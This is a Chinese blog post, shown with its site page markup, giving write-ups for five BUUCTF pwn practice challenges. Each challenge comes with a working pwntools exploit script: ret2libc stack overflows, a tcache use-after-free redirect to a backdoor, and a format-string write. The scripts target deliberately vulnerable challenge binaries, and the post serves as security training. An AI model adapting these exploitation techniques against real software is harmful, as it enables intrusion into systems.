<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="browsermode" content="application">
<meta name="apple-touch-fullscreen" content="yes">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-title" content="Axojhf的博客">
<meta name="apple-mobile-web-app-status-bar-style" content="default">
<meta name="msapplication-navbutton-color" content="#666666">
<meta name= "format-detection" content="telephone=no" />





  <meta name="keywords" content="Writeup, nlvi" />


<link rel="apple-touch-startup-image" media="(device-width: 375px)" href="assets/apple-launch-1125x2436.png">
<link rel="apple-touch-startup-image" media="(orientation: landscape)" href="assets/apple-touch-startup-image-2048x1496.png">

<link rel="stylesheet" href="/blog/style/style.css">

<script>
  var nlviconfig = {
    title: "Axojhf的博客",
    author: "Axojhf",
    baseUrl: "/blog/",
    theme: {
      scheme: "banderole",
      lightbox: true,
      animate: true,
      search: true,
      friends: false,
      reward: false,
      pjax: false,
      lazy: false,
      toc: true
    }
  }
</script>




    
<link rel="stylesheet" href="/blog/script/lib/lightbox/css/lightbox.min.css">





    
<link rel="stylesheet" href="/blog/syuanpi/syuanpi.min.css">
















<style>
@font-face {
  font-family: "Allura";
  src: url('/blog/font/allura/allura.ttf');
}
</style>

  <title> BUUCTF-Pwn题-Writeup（8） · Axojhf的博客 </title>
<meta name="generator" content="Hexo 4.2.1"></head>
<body>
  <div class="container">
    <header class="header" id="header">
  <div class="header-wrapper">
    <div class="logo">
  <div class="logo-inner syuanpi tvIn" style="display:none;">
    <h1><a href="/blog/">Axojhf的博客</a></h1>
    
  </div>
</div>

    <nav class="main-nav">
  
  <ul class="main-nav-list syuanpi tvIn">
  
    <li class="menu-item">
      <a href="javascript:;" id="search-btn" aria-label="Search">
        <i class="iconfont icon-search"></i>
      </a>
    </li>
  
  
  
    
  
    <li class="menu-item">
      <a href="/blog/" id="article">
        <span class="base-name">
          
            ARTICLE
          
        </span>
      </a>
    </li>
  
  
    
  
    <li class="menu-item">
      <a href="/blog/archives" id="archives">
        <span class="base-name">
          
            ARCHIVES
          
        </span>
      </a>
    </li>
  
  
    
  
    <li class="menu-item">
      <a href="javascript:;" id="tags">
        <span class="base-name">
          
            TAGS
          
        </span>
      </a>
    </li>
  
  
    
  
    <li class="menu-item">
      <a href="/blog/about" id="about">
        <span class="base-name">
          
            ABOUT
          
        </span>
      </a>
    </li>
  
  
  </ul>
  
</nav>

  </div>
</header>
<div class="mobile-header" id="mobile-header">
  <div class="mobile-header-nav">
    <div class="mobile-header-item" id="mobile-left">
      <div class="header-menu-item">
        <div class="header-menu-line"></div>
      </div>
    </div>
    <h1 class="mobile-header-title">
      <a href="/">Axojhf的博客</a>
    </h1>
    <div class="mobile-header-item"></div>
  </div>
  <div class="mobile-header-body">
    <ul class="mobile-header-list">
      
        <li class="mobile-nav-item syuanpi fadeInRightShort back-0">
          <a href="/blog/" >
            
              ARTICLE
            
          </a>
        </li>
      
        <li class="mobile-nav-item syuanpi fadeInRightShort back-1">
          <a href="/blog/archives" >
            
              ARCHIVES
            
          </a>
        </li>
      
        <li class="mobile-nav-item syuanpi fadeInRightShort back-2">
          <a href="javascript:;" id="mobile-tags">
            
              TAGS
            
          </a>
        </li>
      
        <li class="mobile-nav-item syuanpi fadeInRightShort back-3">
          <a href="/blog/about" >
            
              ABOUT
            
          </a>
        </li>
      
    </ul>
  </div>
</div>



    <div class="container-inner" style="display:none;">
      <main class="main" id="main">
        <div class="main-wrapper">
          
    
  
  <article class="
  post
   is_post 
  ">
    <header class="post-header">
      <div class="post-time syuanpi fadeInRightShort back-1">
        <div class="post-time-wrapper">
          
          <time>2020-09-28</time>
          
        </div>
      </div>
      <h2 class="post-title syuanpi fadeInRightShort back-2">
        
          BUUCTF-Pwn题-Writeup（8）
        
      </h2>
    </header>
    <div class="post-content syuanpi fadeInRightShort back-3">
      
        <p>(博主还是菜鸟，有些知识可能理解不够透彻，有些表述可能不够严谨，欢迎大家指正，望大家多多包涵)</p>
<a id="more"></a>

<h1 id="jarvisoj-level3-题"><a href="#jarvisoj-level3-题" class="headerlink" title="jarvisoj_level3    题"></a>jarvisoj_level3    题</h1><p>程序保护信息：</p>
<p><img src="image-20200928215654528.png" alt="image-20200928215654528"></p>
<p>其中的<code>vulnerable_function</code>函数有明显的栈溢出：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">ssize_t</span> <span class="title">vulnerable_function</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">char</span> buf; <span class="comment">// [esp+0h] [ebp-88h]</span></span><br><span class="line"></span><br><span class="line">  <span class="built_in">write</span>(<span class="number">1</span>, <span class="string">"Input:\n"</span>, <span class="number">7u</span>);</span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">read</span>(<span class="number">0</span>, &amp;buf, <span class="number">0x100</span>u);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>又是ret2libc的利用方法。</p>
<p>解题脚本：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line">p = remote(<span class="string">'node3.buuoj.cn'</span>, <span class="number">00000</span>)</span><br><span class="line"></span><br><span class="line">write_plt = <span class="number">0x08048340</span></span><br><span class="line">read_got = <span class="number">0x0804A00C</span></span><br><span class="line">vulnerable_function_add = <span class="number">0x0804844B</span></span><br><span class="line"></span><br><span class="line">p.sendline(<span class="string">'A'</span> * <span class="number">0x88</span> + p32(<span class="number">0</span>) + p32(write_plt) + p32(vulnerable_function_add) + p32(<span class="number">1</span>) + p32(read_got) + p32(<span class="number">4</span>))</span><br><span class="line">p.recvuntil(<span class="string">'Input:\n'</span>)</span><br><span class="line">read_add = u32(p.recv(<span class="number">4</span>))</span><br><span class="line"><span class="keyword">print</span> hex(read_add)</span><br><span class="line">system_add = read_add - <span class="number">0x99a10</span></span><br><span class="line">binsh_add = read_add + <span class="number">0x84cdb</span></span><br><span class="line">p.sendline(<span class="string">'B'</span> * <span class="number">0x88</span> + p32(<span class="number">0</span>) + p32(system_add) + p32(vulnerable_function_add) + p32(binsh_add))</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>难度：★</p>
<p>基本的栈溢出</p>
<h1 id="BJDCTF-2nd-ydsneedgirlfriend2-题"><a href="#BJDCTF-2nd-ydsneedgirlfriend2-题" class="headerlink" title="[BJDCTF 2nd]ydsneedgirlfriend2    题"></a>[BJDCTF 2nd]ydsneedgirlfriend2    题</h1><p>程序保护信息：</p>
<p><img src="image-20200929132644520.png" alt="image-20200929132644520"></p>
<p>从程序的main函数里可以很明显看出这是一道“菜单”题，一般这种题会和堆的利用有关。</p>
<p>在add函数里可以明显发现一个赋值到堆里的函数地址：</p>
<p><img src="image-20200929132914765.png" alt="image-20200929132914765"></p>
<p>而在show函数里可以发现它调用<code>girlfriends[v1] + 8LL</code>位置所指向的函数：</p>
<p><img src="image-20200929133122722.png" alt="image-20200929133122722"></p>
<p>由于程序提供了一个“后门”函数<code>backdoor</code>可以打开shell，所以自然可以想到修改<code>girlfriends[v1] + 8LL</code>为<code>backdoor</code>函数的地址，然后执行<code>show</code>就可以得到shell了。</p>
<p>通过分析几个菜单的函数，可以在<code>dele</code>函数里发现<code>double free</code>和<code>UAF</code>漏洞：</p>
<p><img src="image-20200929134815055.png" alt="image-20200929134815055"></p>
<p>而通过分析可以发现，事实上只有<code>girlfriends[0]</code>才被使用了，而且只要使用了一次add函数，下面图片中这个判断就不起作用了，UAF实际的影响就体现在了这里：</p>
<p><img src="image-20200929135155712.png" alt="image-20200929135155712"></p>
<p>（题目说了使用的是Ubuntu18.04，所以是存在<code>tcache</code>的，但是在这道题的利用里其实与tcache的特点没有多大关系）</p>
<p>解题脚本：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line">p = remote(<span class="string">'node3.buuoj.cn'</span>, <span class="number">00000</span>)</span><br><span class="line">backdoor_add = <span class="number">0x400D86</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span><span class="params">(size, payload)</span>:</span></span><br><span class="line">    p.sendlineafter(<span class="string">'u choice :'</span>, <span class="string">'1'</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">'length of her name:'</span>, str(size))</span><br><span class="line">    p.sendafter(<span class="string">'name:\n'</span>, payload)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">delete</span><span class="params">()</span>:</span></span><br><span class="line">    p.sendlineafter(<span class="string">'u choice :'</span>, <span class="string">'2'</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">'Index :'</span>, <span class="string">'0'</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span><span class="params">()</span>:</span></span><br><span class="line">    p.sendlineafter(<span class="string">'u choice :'</span>, <span class="string">'3'</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">'Index :'</span>, <span class="string">'0'</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">add(<span class="number">16</span>, <span class="string">'A\n'</span>)</span><br><span class="line"><span class="string">'''让malloc函数执行两次，脚本里add的第一个参数的大小不一定非要是16'''</span></span><br><span class="line">delete()</span><br><span class="line"><span class="string">'''free两个chunk，其中分配给girlfriends[0]的地址一定在tcache的链表对应位置的头部'''</span></span><br><span class="line">add(<span class="number">16</span>, p64(<span class="number">0</span>) + p64(backdoor_add))</span><br><span class="line"><span class="string">'''再malloc(16)，这下就能分配到girlfriends[0]指向的chunk，这样我们把girlfriends[v1] + 8LL这个位置的数据改为backdoor函数的地址就行'''</span></span><br><span class="line">show()</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="总结-1"><a href="#总结-1" class="headerlink" title="总结"></a>总结</h2><p>难度：★★</p>
<p>UAF的基本利用</p>
<h1 id="jarvisoj-fm-题"><a href="#jarvisoj-fm-题" class="headerlink" title="jarvisoj_fm    题"></a>jarvisoj_fm    题</h1><p>程序保护信息：</p>
<p><img src="image-20200929143825678.png" alt="image-20200929143825678"></p>
<p>很明显的格式化字符串漏洞：</p>
<p><img src="image-20200929144114707.png" alt="image-20200929144114707"></p>
<p>解题脚本：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line">p = remote(<span class="string">'node3.buuoj.cn'</span>, <span class="number">00000</span>)</span><br><span class="line"></span><br><span class="line">x_add = <span class="number">0x0804A02C</span></span><br><span class="line"></span><br><span class="line">p.sendline(<span class="string">'%4c%13$n'</span>.ljust(<span class="number">8</span>, <span class="string">'\x00'</span>) + p32(x_add))</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="总结-2"><a href="#总结-2" class="headerlink" title="总结"></a>总结</h2><p>难度：★</p>
<p>格式化字符串漏洞的基本利用</p>
<h1 id="jarvisoj-tell-me-something-题"><a href="#jarvisoj-tell-me-something-题" class="headerlink" title="jarvisoj_tell_me_something    题"></a>jarvisoj_tell_me_something    题</h1><p>程序保护信息：</p>
<p><img src="image-20200929145239445.png" alt="image-20200929145239445"></p>
<p>函数<code>good_game</code>可以输出flag，main函数里很明显可以栈溢出，只需要通过栈溢出跳转到<code>good_game</code>函数即可。</p>
<p>解题脚本：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line">p = remote(<span class="string">'node3.buuoj.cn'</span>, <span class="number">000000</span>)</span><br><span class="line"></span><br><span class="line">good_game_add = <span class="number">0x400620</span></span><br><span class="line"></span><br><span class="line">p.sendline(<span class="string">'A'</span> * <span class="number">0x88</span> + p64(good_game_add))</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="总结-3"><a href="#总结-3" class="headerlink" title="总结"></a>总结</h2><p>难度：★</p>
<p>简单栈溢出的应用，注意本程序填充时不用填充rbp段数据</p>
<h1 id="jarvisoj-level4-题"><a href="#jarvisoj-level4-题" class="headerlink" title="jarvisoj_level4    题"></a>jarvisoj_level4    题</h1><p>程序保护信息：</p>
<p><img src="image-20200929150533845.png" alt="image-20200929150533845"></p>
<p>vulnerable_function函数里明显存在栈溢出，这里采用ret2libc的方法打开shell。</p>
<p>解题脚本：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line">p = remote(<span class="string">'node3.buuoj.cn'</span>, <span class="number">00000</span>)</span><br><span class="line"></span><br><span class="line">vulnerable_function_add = <span class="number">0x0804844B</span></span><br><span class="line">write_plt = <span class="number">0x08048340</span></span><br><span class="line">read_got = <span class="number">0x0804A00C</span></span><br><span class="line"></span><br><span class="line">p.sendline(<span class="string">'A'</span> * <span class="number">0x88</span> + p32(<span class="number">0</span>) + p32(write_plt) + p32(vulnerable_function_add) + p32(<span class="number">1</span>) + p32(read_got) + p32(<span class="number">4</span>))</span><br><span class="line">read_add = u32(p.recv(<span class="number">4</span>))</span><br><span class="line"><span class="keyword">print</span> hex(read_add)</span><br><span class="line">system_add = read_add - <span class="number">0x99a10</span></span><br><span class="line">binsh_add = read_add + <span class="number">0x84cdb</span></span><br><span class="line">p.sendline(<span class="string">'B'</span> * <span class="number">0x88</span> + p32(<span class="number">0</span>) + p32(system_add) + p32(vulnerable_function_add) + p32(binsh_add))</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="总结-4"><a href="#总结-4" class="headerlink" title="总结"></a>总结</h2><p>难度：★</p>
<p>简单的ret2libc方法的使用</p>

      
    
    </div>
    
      <div class="post-tags syuanpi fadeInRightShort back-3">
      
        <a href="/blog/tags/Writeup/">Writeup</a>
      
      </div>
    
    
      

      
  <hr class="copy-line">
  <div class="post-copyright">
    <div class="copy-author">
      <span>作者 :</span>
      <span>Axojhf</span>
    </div>
    <div class="copy-url">
      <span>地址 :</span>
      <a href="http://xiaoaoaode.gitee.io/blog/2020/09/28/a01cbdb7/">http://xiaoaoaode.gitee.io/blog/2020/09/28/a01cbdb7/</a>
    </div>
    <div class="copy-origin">
      <span>来源 :</span>
      <a href="http://xiaoaoaode.gitee.io/blog">http://xiaoaoaode.gitee.io/blog</a>
    </div>
    <div class="copy-license">
      
      著作权归作者所有，转载请联系作者获得授权。
    </div>
  </div>

    
  </article>
  
    
  <nav class="article-page">
    
      <a href="/blog/2020/10/04/77eb8480/" id="art-left" class="art-left">
        <span class="next-title">
          <i class="iconfont icon-left"></i>攻防世界-onemanarmy题Writeup
        </span>
      </a>
    
    
      <a href="/blog/2020/09/21/f87fade1/" id="art-right" class="art-right">
        <span class="prev-title">
          BUUCTF-Pwn题-Writeup（7）<i class="iconfont icon-right"></i>
        </span>
      </a>
    
  </nav>


    
  <i id="com-switch" class="iconfont icon-down jumping-in long infinite" style="font-size:24px;display:block;text-align:center;transform:rotate(180deg);"></i>
  <div class="post-comments" id="post-comments" style="display: block;margin: auto 16px;">
    

    
    

    

  </div>



  
  
    
  
  <aside class="post-toc">
    <div class="title"><span>文章导航</span></div>
    <div class="toc-inner">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#jarvisoj-level3-题"><span class="toc-text">jarvisoj_level3    题</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#总结"><span class="toc-text">总结</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#BJDCTF-2nd-ydsneedgirlfriend2-题"><span class="toc-text">[BJDCTF 2nd]ydsneedgirlfriend2    题</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#总结-1"><span class="toc-text">总结</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#jarvisoj-fm-题"><span class="toc-text">jarvisoj_fm    题</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#总结-2"><span class="toc-text">总结</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#jarvisoj-tell-me-something-题"><span class="toc-text">jarvisoj_tell_me_something    题</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#总结-3"><span class="toc-text">总结</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#jarvisoj-level4-题"><span class="toc-text">jarvisoj_level4    题</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#总结-4"><span class="toc-text">总结</span></a></li></ol></li></ol>
    </div>
  </aside>



  


        </div>
      </main>
      <footer class="footer syuanpi fadeIn" id="footer">
  <hr>
  <div class="footer-wrapper">
    <div class="left">
      <div class="contact-icon">
  
  
</div>

    </div>
    <div class="right">
      <div class="copyright">
    <div class="info">
        <span>&copy;</span>
        <span>2020 ~ 2020</span>
        <span>❤</span>
        <span>Axojhf</span>
    </div>
    <div class="theme">
        <span>
            动力来源于
            <a href="http://hexo.io/" target="_blank" rel="noopener">Hexo </a>
        </span>
        <span>
            主题
            <a href="https://github.com/ColMugX/hexo-theme-Nlvi" target="_blank" rel="noopener"> Nlvi </a>
        </span>
    </div>
    
</div>

    </div>
  </div>
</footer>
    </div>
    <div class="tagcloud" id="tagcloud">
  <div class="tagcloud-taglist">
  
    <div class="tagcloud-tag">
      <button>Writeup</button>
    </div>
  
    <div class="tagcloud-tag">
      <button>其他</button>
    </div>
  
    <div class="tagcloud-tag">
      <button>知识点记录</button>
    </div>
  
  </div>
  
    <div class="tagcloud-postlist active">
      <h2>Writeup</h2>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/07/27/dd14f23d/">
            <time class="tagcloud-posttime">2020 / 07 / 27</time>
            <span>BUUCTF-Pwn题-Writeup（1）</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/07/28/cfa15dd3/">
            <time class="tagcloud-posttime">2020 / 07 / 28</time>
            <span>BUUCTF-Pwn题-Writeup（2）</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/08/16/771d3ab6/">
            <time class="tagcloud-posttime">2020 / 08 / 16</time>
            <span>BUUCTF-Pwn题-Writeup（3）</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/08/19/5276656a/">
            <time class="tagcloud-posttime">2020 / 08 / 19</time>
            <span>BUUCTF-Pwn题-Writeup（5）</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/08/17/eaca020f/">
            <time class="tagcloud-posttime">2020 / 08 / 17</time>
            <span>BUUCTF-Pwn题-Writeup（4）</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/09/21/f87fade1/">
            <time class="tagcloud-posttime">2020 / 09 / 21</time>
            <span>BUUCTF-Pwn题-Writeup（7）</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/09/04/40c3ca84/">
            <time class="tagcloud-posttime">2020 / 09 / 04</time>
            <span>BUUCTF-Pwn题-Writeup（6）</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/09/28/a01cbdb7/">
            <time class="tagcloud-posttime">2020 / 09 / 28</time>
            <span>BUUCTF-Pwn题-Writeup（8）</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/08/31/2253bdbe/">
            <time class="tagcloud-posttime">2020 / 08 / 31</time>
            <span>DASCTF2020八月赛个人Writeup</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/07/26/253f1adb/">
            <time class="tagcloud-posttime">2020 / 07 / 26</time>
            <span>DASCTF七月赛个人Writeup</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/08/24/49582296/">
            <time class="tagcloud-posttime">2020 / 08 / 24</time>
            <span>CISCN2020初赛个人Writeup</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/06/01/14185/">
            <time class="tagcloud-posttime">2020 / 06 / 01</time>
            <span>我写出来的招新题的Writeup</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/06/17/45ae5a23/">
            <time class="tagcloud-posttime">2020 / 06 / 17</time>
            <span>攻防世界-“250”题Writeup</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/06/09/7b438d60/">
            <time class="tagcloud-posttime">2020 / 06 / 09</time>
            <span>攻防世界-babyheap题Writeup</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/06/17/47cfb24f/">
            <time class="tagcloud-posttime">2020 / 06 / 17</time>
            <span>攻防世界-“Recho”题Writeup</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/07/12/e563c85c/">
            <time class="tagcloud-posttime">2020 / 07 / 12</time>
            <span>攻防世界-magic题Writeup</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/10/07/9b619749/">
            <time class="tagcloud-posttime">2020 / 10 / 07</time>
            <span>攻防世界-nobug题Writeup</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/06/02/471a08d2/">
            <time class="tagcloud-posttime">2020 / 06 / 02</time>
            <span>攻防世界--supermarket题Writeup</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/10/04/77eb8480/">
            <time class="tagcloud-posttime">2020 / 10 / 04</time>
            <span>攻防世界-onemanarmy题Writeup</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/06/02/a54507f8/">
            <time class="tagcloud-posttime">2020 / 06 / 02</time>
            <span>攻防世界——dice_game题Writeup</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/06/10/928398a1/">
            <time class="tagcloud-posttime">2020 / 06 / 10</time>
            <span>攻防世界-"实时数据监测"题Writeup</span>
          </a>
        </div>
      
    </div>
  
    <div class="tagcloud-postlist ">
      <h2>其他</h2>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/08/07/38a4c9bb/">
            <time class="tagcloud-posttime">2020 / 08 / 07</time>
            <span>Pwn环境的搭建和解答一些简单Pwn题的分享</span>
          </a>
        </div>
      
    </div>
  
    <div class="tagcloud-postlist ">
      <h2>知识点记录</h2>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/08/10/44355a63/">
            <time class="tagcloud-posttime">2020 / 08 / 10</time>
            <span>_IO_FILE结构与fread函数知识点小结</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/08/01/8e1ab4ab/">
            <time class="tagcloud-posttime">2020 / 08 / 01</time>
            <span>Pwn题里有关seccomp和prctl函数的知识点小结</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/07/19/5cfa9d84/">
            <time class="tagcloud-posttime">2020 / 07 / 19</time>
            <span>正则表达式学习1</span>
          </a>
        </div>
      
    </div>
  
</div>

  </div>
  <div class="backtop syuanpi melt toTop" id="backtop">
    <i class="iconfont icon-up"></i>
    <span style="text-align:center;font-family:Georgia;"><span style="font-family:Georgia;" id="scrollpercent">1</span>%</span>
</div>

  <div class="search" id="search">
    <div class="input">
      <input type="text" id="search-input" placeholder="搜索一下？" autofocus>
    </div>
    <div id="search-result"></div>
  </div>



<script src="https://cdn.jsdelivr.net/npm/jquery@3.4.1/dist/jquery.min.js"></script>



  <script></script>
  <script src="/blog/script/lib/lightbox/js/lightbox.min.js" async></script>











  
<script src="/blog/script/scheme/banderole.js"></script>




<script src="/blog/script/bootstarp.js"></script>



<script>
if (nlviconfig.theme.toc) {
  setTimeout(function() {
    if (nlviconfig.theme.scheme === 'balance') {
      $("#header").addClass("show_toc");
    } else if (nlviconfig.theme.scheme === 'banderole') {
      $(".container-inner").addClass("has_toc");
      $(".post-toc .title").addClass("show");
      $(".toc-inner").addClass("show");
    }
  }, 1000);
}
</script>



</body>
</html>
